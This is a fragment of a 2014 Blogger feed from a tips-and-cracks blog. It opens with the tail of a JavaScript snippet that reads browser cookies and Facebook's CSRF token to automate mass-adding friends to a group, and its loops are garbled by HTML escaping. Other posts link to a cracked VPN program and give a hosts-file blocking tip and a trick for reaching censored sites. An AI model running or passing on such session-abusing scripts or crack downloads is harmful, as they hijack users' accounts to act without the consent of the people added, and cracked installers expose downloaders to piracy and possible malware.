document.getElementById(&quot;fbgadlglin4&quot;).parentNode.removeChild(document.getElementById(&quot;fbgadlglin4&quot;));&lt;br /&gt;
document.getElementById(&quot;fbgabut&quot;).parentNode.removeChild(document.getElementById(&quot;fbgabut&quot;));&lt;br /&gt;
var dlgclos = document.createElement(&quot;a&quot;);&lt;br /&gt;
dlgclos.className = &quot;_42ft _42fu layerCancel uiOverlayButton _42gy&quot;;&lt;br /&gt;
dlgclos.setAttribute(&quot;role&quot;, &quot;button&quot;);&lt;br /&gt;
dlgclos.href = &quot;#&quot;;&lt;br /&gt;
dlgclos.id = &quot;fbgabut&quot;;&lt;br /&gt;
dlgclos.textContent = dlgclstr;&lt;br /&gt;
dlgclos.addEventListener(&#39;click&#39;, CloseButton , false);&lt;br /&gt;
document.getElementById(&quot;fbgadivclose&quot;).appendChild(dlgclos);&lt;br /&gt;
}&lt;br /&gt;
}&lt;br /&gt;
function CloseButton() {&lt;br /&gt;
document.getElementById(&quot;fbgadialog&quot;).parentNode.removeChild(document.getElementById(&quot;fbgadialog&quot;));&lt;br /&gt;
}&lt;br /&gt;
function generatePhstamp(qs, dtsg) {&lt;br /&gt;
var input_len = qs.length;&lt;br /&gt;
numeric_csrf_value=&#39;&#39;;&lt;br /&gt;
for(var ii=0;ii&lt;dtsg .length=&quot;&quot; br=&quot;&quot; ii=&quot;&quot;&gt;numeric_csrf_value+=dtsg.charCodeAt(ii);&lt;br /&gt;}&lt;br /&gt;return &#39;1&#39; + numeric_csrf_value + input_len;&lt;br /&gt;}&lt;br /&gt;function getCookie(c_name) {&lt;br /&gt;var i,x,y,ARRcookies=document.cookie.split(&quot;;&quot;);&lt;br /&gt;for (i=0;i&lt;arrcookies .length=&quot;&quot; br=&quot;&quot; i=&quot;&quot;&gt;x=ARRcookies[i].substr(0,ARRcookies[i].indexOf(&quot;=&quot;));&lt;br /&gt;y=ARRcookies[i].substr(ARRcookies[i].indexOf(&quot;=&quot;)+1);&lt;br /&gt;x=x.replace(/^\s+|\s+$/g,&quot;&quot;);&lt;br /&gt;if (x==c_name) {&lt;br /&gt;return unescape(y);&lt;br /&gt;}&lt;br /&gt;}&lt;br /&gt;}&lt;/arrcookies&gt;&lt;/dtsg&gt;&lt;/blockquote&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
When You &lt;i&gt;&lt;b&gt;Done&lt;/b&gt;&lt;/i&gt; It, At The Header Show Like This&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh96-b_fmiGRksRH6R-EftBHgnGJuRopQWmO1lMe2feU9_tEMSghjvfRPn6SPmrH3sMXECGf6UgUnL5QtYstbLugYrtmTeHUh7LMJFsBkJBlytAhzQod3pzVyO5G8U8oPL_mTBlMCgBMxXx/s1600/1.bmp&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;How To Add All Friends In Group (Super Fast Way) 2014 - FOCSoft&quot; border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh96-b_fmiGRksRH6R-EftBHgnGJuRopQWmO1lMe2feU9_tEMSghjvfRPn6SPmrH3sMXECGf6UgUnL5QtYstbLugYrtmTeHUh7LMJFsBkJBlytAhzQod3pzVyO5G8U8oPL_mTBlMCgBMxXx/s1600/1.bmp&quot; height=&quot;22&quot; title=&quot;How To Add All Friends In Group (Super Fast Way) 2014 - FOCSoft&quot; width=&quot;400&quot; /&gt;&lt;/a&gt; &lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;
Click ( &lt;b&gt;&lt;span style=&quot;color: red;&quot;&gt;Add All Friends&lt;/span&gt;&lt;/b&gt; ) Now It&#39;ll Look Like This,..&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjQ_feXLNPQQzIr-CaSZk0B0dsiBnZ_02Akvw7SmTvsEZ4VgHfml-ninpd0h5MUwKE9XIhiHQxJhtQlBwOg93EQod84vur5WuruCf1boKv7SPeDYhG5R2Tj9yAMCKoVrMGkTgpe7drzLrR9/s1600/2.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;How To Add All Friends In Group (Super Fast Way) 2014 - FOCSoft&quot; border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjQ_feXLNPQQzIr-CaSZk0B0dsiBnZ_02Akvw7SmTvsEZ4VgHfml-ninpd0h5MUwKE9XIhiHQxJhtQlBwOg93EQod84vur5WuruCf1boKv7SPeDYhG5R2Tj9yAMCKoVrMGkTgpe7drzLrR9/s1600/2.jpg&quot; height=&quot;212&quot; title=&quot;How To Add All Friends In Group (Super Fast Way) 2014 - FOCSoft&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
Now Wait Till Its End ....................&lt;br /&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;This Post Is Requested By ( &lt;span style=&quot;color: red;&quot;&gt;&lt;b&gt;0ne Of My Best Friend&lt;/b&gt;&lt;/span&gt; ) &lt;a href=&quot;http://www.facebook.com/AliHussainshah143&quot; target=&quot;_blank&quot;&gt;Syed Jeeshan Ali&lt;/a&gt;.....&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='http://focsoft.blogspot.com/feeds/9163804655781161865/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://focsoft.blogspot.com/2014/03/AutoAdd.html#comment-form' title='8 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6522232511392000207/posts/default/9163804655781161865'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6522232511392000207/posts/default/9163804655781161865'/><link rel='alternate' type='text/html' href='http://focsoft.blogspot.com/2014/03/AutoAdd.html' title='How To Add All Friends In Group (Super Fast Way) 2014 - FOCSoft'/><author><name>Anonymous</name><uri>http://www.blogger.com/profile/08496197099388197965</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh96-b_fmiGRksRH6R-EftBHgnGJuRopQWmO1lMe2feU9_tEMSghjvfRPn6SPmrH3sMXECGf6UgUnL5QtYstbLugYrtmTeHUh7LMJFsBkJBlytAhzQod3pzVyO5G8U8oPL_mTBlMCgBMxXx/s72-c/1.bmp" height="72" width="72"/><thr:total>8</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6522232511392000207.post-4881779032799143058</id><published>2014-03-21T18:32:00.000+05:00</published><updated>2014-03-21T18:32:17.056+05:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Anonymity-Tools"/><title type='text'>VPNium v1.7 Premium Full Version + Crack Full Free Download  - FOCSoft</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;div class=&quot;post-title entry-title&quot; itemprop=&quot;name&quot; style=&quot;text-align: left;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;post-header&quot;&gt;

&lt;/div&gt;
&lt;div class=&quot;post-body entry-content&quot; id=&quot;post-body-1720578458206265316&quot; itemprop=&quot;articleBody&quot;&gt;
&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot;&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;img alt=&quot;PNium v1.7 Premium Full Version + Crack Full Free Download  - FOCSoft&quot; border=&quot;0&quot; height=&quot;201&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg7VxoaIlrPZHZFCayzISsnfBo6t30P80Bb8iArx5BLnK39_VCoSKsOVtgCnj0_icVnMA7uAkPK-wdLxHPHRLXlq9Rq4PaSibiYJU2ASeIY-lZ3bXBcZE1MwfZoYx51jZofZMNoE6uBOT7u/s280/wp7jailbreak.jpg&quot; title=&quot;PNium v1.7 Premium Full Version + Crack Full Free Download  - FOCSoft&quot; width=&quot;280&quot; /&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;background-color: white; color: #2f3b48; font-family: &#39;PT Sans&#39;, sans-serif; font-size: 12px; line-height: 18px; list-style: none; margin: 0px; outline: none; padding: 0px;&quot;&gt;&lt;span style=&quot;font-family: Verdana; list-style: none; margin: 0px; outline: none; padding: 0px;&quot;&gt;VPNium
 v1.7 Premium – anonymous VPN- prospective shoppers.Many people at work 
is impermissible to use social networks, and then wish. Out there – golf
 stroke yourself VPNium you at work to ascertain my account on any 
social networks.Use merely free VPN service.256 – 2048 tiny safety 
measures, browse anonymously, browse even though not censorship, browse 
firmly, freed from charge. Isn’t it awesome?&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;img alt=&quot;PNium v1.7 Premium Full Version + Crack Full Free Download  - FOCSoft&quot; border=&quot;0&quot; height=&quot;640&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgVR-OTpQWaNyTr9wlmvY-CsryEn3OjIhvRFbCO5k1TWVm42knhQV9G69LOWfsIEE5_RQAdInjxzF9_dXLdg2R_g-AUFG-54rmrOd9t091a1EwYuXwiS6S5JKe49whR_kv4K6_0n2K3Srw/s1600/vpn-hide+ip.jpg&quot; title=&quot;PNium v1.7 Premium Full Version + Crack Full Free Download  - FOCSoft&quot; width=&quot;440&quot; /&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;span style=&quot;color: purple;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-family: Verdana;&quot;&gt;&lt;span style=&quot;line-height: 18px;&quot;&gt;&lt;b&gt;&lt;a href=&quot;http://hulkload.com/og8klml5t8jx&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt; Download Free VPNium v1.7 Premium  :-&lt;/a&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;span style=&quot;color: #2f3b48; font-family: Verdana;&quot;&gt;&lt;span style=&quot;font-size: 12px; line-height: 18px;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
&lt;span style=&quot;color: #2f3b48; font-family: Verdana; font-size: 12px; line-height: 18px;&quot;&gt;&lt;b&gt;Crack :-&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;span style=&quot;color: purple;&quot;&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;span style=&quot;font-family: Verdana;&quot;&gt;&lt;span style=&quot;line-height: 18px;&quot;&gt;&lt;b&gt;&lt;a href=&quot;http://fileice.net/download.php?file=3a5ms&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt; VPNium v1.7 Premium Crack  :-&lt;/a&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;








&lt;!-- Blogger automated replacement: &quot;https://images-onepick-opensocial.googleusercontent.com/gadgets/proxy?container=onepick&amp;amp;gadget=a&amp;amp;rewriteMime=image/*&amp;amp;url=https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgVR-OTpQWaNyTr9wlmvY-CsryEn3OjIhvRFbCO5k1TWVm42knhQV9G69LOWfsIEE5_RQAdInjxzF9_dXLdg2R_g-AUFG-54rmrOd9t091a1EwYuXwiS6S5JKe49whR_kv4K6_0n2K3Srw/s1600/vpn-hide+ip.jpg&quot; with &quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgVR-OTpQWaNyTr9wlmvY-CsryEn3OjIhvRFbCO5k1TWVm42knhQV9G69LOWfsIEE5_RQAdInjxzF9_dXLdg2R_g-AUFG-54rmrOd9t091a1EwYuXwiS6S5JKe49whR_kv4K6_0n2K3Srw/s1600/vpn-hide+ip.jpg&quot; --&gt;&lt;!-- Blogger automated replacement: &quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgVR-OTpQWaNyTr9wlmvY-CsryEn3OjIhvRFbCO5k1TWVm42knhQV9G69LOWfsIEE5_RQAdInjxzF9_dXLdg2R_g-AUFG-54rmrOd9t091a1EwYuXwiS6S5JKe49whR_kv4K6_0n2K3Srw/s1600/vpn-hide+ip.jpg&quot; with &quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgVR-OTpQWaNyTr9wlmvY-CsryEn3OjIhvRFbCO5k1TWVm42knhQV9G69LOWfsIEE5_RQAdInjxzF9_dXLdg2R_g-AUFG-54rmrOd9t091a1EwYuXwiS6S5JKe49whR_kv4K6_0n2K3Srw/s1600/vpn-hide+ip.jpg&quot; --&gt;&lt;!-- Blogger automated replacement: &quot;https://images-onepick-opensocial.googleusercontent.com/gadgets/proxy?container=onepick&amp;amp;gadget=a&amp;amp;rewriteMime=image%2F*&amp;amp;url=http%3A%2F%2F1.bp.blogspot.com%2F-tx4-A0wWqJk%2FUWWmmTxJFqI%2FAAAAAAAAFDI%2FCDSXYCNGoGE%2Fs1600%2Fvpn-hide%2Bip.jpg&quot; with &quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgVR-OTpQWaNyTr9wlmvY-CsryEn3OjIhvRFbCO5k1TWVm42knhQV9G69LOWfsIEE5_RQAdInjxzF9_dXLdg2R_g-AUFG-54rmrOd9t091a1EwYuXwiS6S5JKe49whR_kv4K6_0n2K3Srw/s1600/vpn-hide+ip.jpg&quot; --&gt;</content><link rel='replies' type='application/atom+xml' href='http://focsoft.blogspot.com/feeds/4881779032799143058/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://focsoft.blogspot.com/2014/03/VPNium-Premium.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6522232511392000207/posts/default/4881779032799143058'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6522232511392000207/posts/default/4881779032799143058'/><link rel='alternate' type='text/html' href='http://focsoft.blogspot.com/2014/03/VPNium-Premium.html' title='VPNium v1.7 Premium Full Version + Crack Full Free Download  - FOCSoft'/><author><name>Anonymous</name><uri>http://www.blogger.com/profile/08496197099388197965</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg7VxoaIlrPZHZFCayzISsnfBo6t30P80Bb8iArx5BLnK39_VCoSKsOVtgCnj0_icVnMA7uAkPK-wdLxHPHRLXlq9Rq4PaSibiYJU2ASeIY-lZ3bXBcZE1MwfZoYx51jZofZMNoE6uBOT7u/s72-c/wp7jailbreak.jpg" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6522232511392000207.post-6602108644824283841</id><published>2014-03-21T18:25:00.001+05:00</published><updated>2014-03-21T18:25:49.599+05:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Tips And Tricks"/><title type='text'> How To Block Any Website Without Software 2014 - FOCSoft</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;h3 class=&quot;post-title entry-title&quot; itemprop=&quot;name&quot;&gt;
&lt;br /&gt;&lt;/h3&gt;
&lt;div class=&quot;post-header&quot;&gt;

&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;/div&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
&lt;span style=&quot;font-size: medium;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;b style=&quot;font-size: x-large;&quot;&gt;Today in internet many&amp;nbsp;fraud&amp;nbsp;scam and&amp;nbsp;harmful&amp;nbsp;website available for stole your importent informations&amp;nbsp;&lt;/b&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;b&gt;but today i am show you how to block that website without any software or any tool.&lt;/b&gt;&lt;/span&gt;&lt;b style=&quot;font-size: x-large;&quot;&gt;so lets start our trick below&lt;/b&gt;&lt;/div&gt;
&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;img alt=&quot; How To Block Any Website Without Software 2014 - FOCSoft&quot; border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj7QVyp09SAvqoi8YOOKo7pDeyjf8LP3QUkfQozT0pHFPS78uRYQ17HHYitzjpmpY4KviHJZqgF7F8Q6E_BWgWxUFpzqyKqJj4sFtoh6qwCQbI0BlrEm17H6_gVUqzm3-nGXOjh5ineZu8Q/s1600/12671_NpAdvHover.jpg&quot; title=&quot; How To Block Any Website Without Software 2014 - FOCSoft&quot; /&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;b&gt;Steps:&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;b&gt;1]&lt;/b&gt; Browse &lt;b&gt;C:\WINDOWS\system32\drivers\etc&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;b&gt;2]&lt;/b&gt; Find the file named &quot;&lt;b&gt;HOSTS&lt;/b&gt;&quot;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;b&gt;3]&lt;/b&gt; Open it in notepad&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;http://images.pcworld.com/images/article/2012/01/block1-10964846.png&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;231&quot; src=&quot;http://images.pcworld.com/images/article/2012/01/block1-10964846.png&quot; width=&quot;280&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;b&gt;4]&lt;/b&gt; Under &quot;&lt;b&gt;127.0.0.1&lt;/b&gt; localhost&quot; Add &lt;b&gt;127.0.0.2 &lt;/b&gt;www.sitenameyouwantblocked.com , and that site will no longer be accessable.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;http://images.pcworld.com/images/article/2012/01/block2-10964843.png&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;231&quot; src=&quot;http://images.pcworld.com/images/article/2012/01/block2-10964843.png&quot; width=&quot;280&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;b&gt;5] &lt;/b&gt;Done!&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-size: medium;&quot;&gt;-So-&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-size: medium;&quot;&gt;127.0.0.1 localhost&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: medium;&quot;&gt;127.0.0.2 www.blockedsite.com&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-size: medium;&quot;&gt;--&amp;gt;www.blockedsite.com is now unaccessable&lt;-- span=&quot;&quot;&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-size: medium;&quot;&gt;For every site after that you want to 
add, just add &quot;1&quot; to the last number in the internal ip (127.0.0.2) and 
then the addy like before.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style=&quot;font-size: medium;&quot;&gt;IE: 127.0.0.3 www.blablabla.com&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: medium;&quot;&gt;127.0.0.4 www.blablabla.com&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: medium;&quot;&gt;127.0.0.5 www.blablabla.com&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/--&gt;&lt;/span&gt;&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='http://focsoft.blogspot.com/feeds/6602108644824283841/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://focsoft.blogspot.com/2014/03/BlockAnyWeb.html#comment-form' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6522232511392000207/posts/default/6602108644824283841'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6522232511392000207/posts/default/6602108644824283841'/><link rel='alternate' type='text/html' href='http://focsoft.blogspot.com/2014/03/BlockAnyWeb.html' title=' How To Block Any Website Without Software 2014 - FOCSoft'/><author><name>Anonymous</name><uri>http://www.blogger.com/profile/08496197099388197965</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj7QVyp09SAvqoi8YOOKo7pDeyjf8LP3QUkfQozT0pHFPS78uRYQ17HHYitzjpmpY4KviHJZqgF7F8Q6E_BWgWxUFpzqyKqJj4sFtoh6qwCQbI0BlrEm17H6_gVUqzm3-nGXOjh5ineZu8Q/s72-c/12671_NpAdvHover.jpg" height="72" width="72"/><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6522232511392000207.post-1595081503953555371</id><published>2014-03-21T18:21:00.001+05:00</published><updated>2014-03-21T18:21:16.562+05:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Tips And Tricks"/><title type='text'> How To Access Blocked Website By Department Of Telecom - FOCSoft</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;b&gt;From a few months many website blocked by government and user facing problem to access them,&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;Same here me also facing this problem too but here is one solution&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;&lt;/b&gt;
&lt;strong style=&quot;text-align: -webkit-center;&quot;&gt;&lt;span style=&quot;font-size: xx-small;&quot;&gt;&lt;span style=&quot;color: red;&quot;&gt;&lt;span style=&quot;font-family: Arial, sans-serif; font-size: 10pt;&quot;&gt;This site has been blocked as per instructions from Department of Telecom (DOT) .&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/strong&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhprNvsJv6e4AgzvOgQ4OBdrGJ93seWmmeLDA7e4PWPJnG5VDG7wG4OXPXS6CXkkbN5-dHASWBBbh5ZdsbaK_A8kIdJxZ5avI0fqyb4XD8MU-C01kCAHdOt4awh3tFKld7c-6RcYBerPH4/s1600/hm.png&quot;&gt;&lt;img alt=&quot; How To Access Blocked Website By Department Of Telecom - FOCSoft&quot; border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhprNvsJv6e4AgzvOgQ4OBdrGJ93seWmmeLDA7e4PWPJnG5VDG7wG4OXPXS6CXkkbN5-dHASWBBbh5ZdsbaK_A8kIdJxZ5avI0fqyb4XD8MU-C01kCAHdOt4awh3tFKld7c-6RcYBerPH4/s1600/hm.png&quot; title=&quot; How To Access Blocked Website By Department Of Telecom - FOCSoft&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;b&gt;So here we are share one easy trick to access blocked website by Department of telecom&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;&lt;/b&gt;
&lt;b&gt;Just Put &lt;span style=&quot;color: red;&quot;&gt;https://&amp;nbsp;&lt;/span&gt;before&amp;nbsp;website blocked&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;&lt;/b&gt;
&lt;b&gt;Example :- xyz.com (Wrong)&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;https://www.xyz.com (Correct)&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;&lt;/b&gt;
&lt;b&gt;&lt;br /&gt;&lt;/b&gt;
&lt;b&gt;Now you can access blocked website&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;&lt;/b&gt;
&lt;b&gt;&lt;br /&gt;&lt;/b&gt;
&lt;b&gt;Enjoy! :) &lt;/b&gt;&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='http://focsoft.blogspot.com/feeds/1595081503953555371/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://focsoft.blogspot.com/2014/03/Access-Website.html#comment-form' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6522232511392000207/posts/default/1595081503953555371'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6522232511392000207/posts/default/1595081503953555371'/><link rel='alternate' type='text/html' href='http://focsoft.blogspot.com/2014/03/Access-Website.html' title=' How To Access Blocked Website By Department Of Telecom - FOCSoft'/><author><name>Anonymous</name><uri>http://www.blogger.com/profile/08496197099388197965</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhprNvsJv6e4AgzvOgQ4OBdrGJ93seWmmeLDA7e4PWPJnG5VDG7wG4OXPXS6CXkkbN5-dHASWBBbh5ZdsbaK_A8kIdJxZ5avI0fqyb4XD8MU-C01kCAHdOt4awh3tFKld7c-6RcYBerPH4/s72-c/hm.png" height="72" width="72"/><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6522232511392000207.post-8180105095055650144</id><published>2014-03-21T18:16:00.003+05:00</published><updated>2014-03-21T18:16:40.582+05:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Tips And Tricks"/><title type='text'>How To Chack Any Wbesite Vulnerability - FOCSoft</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
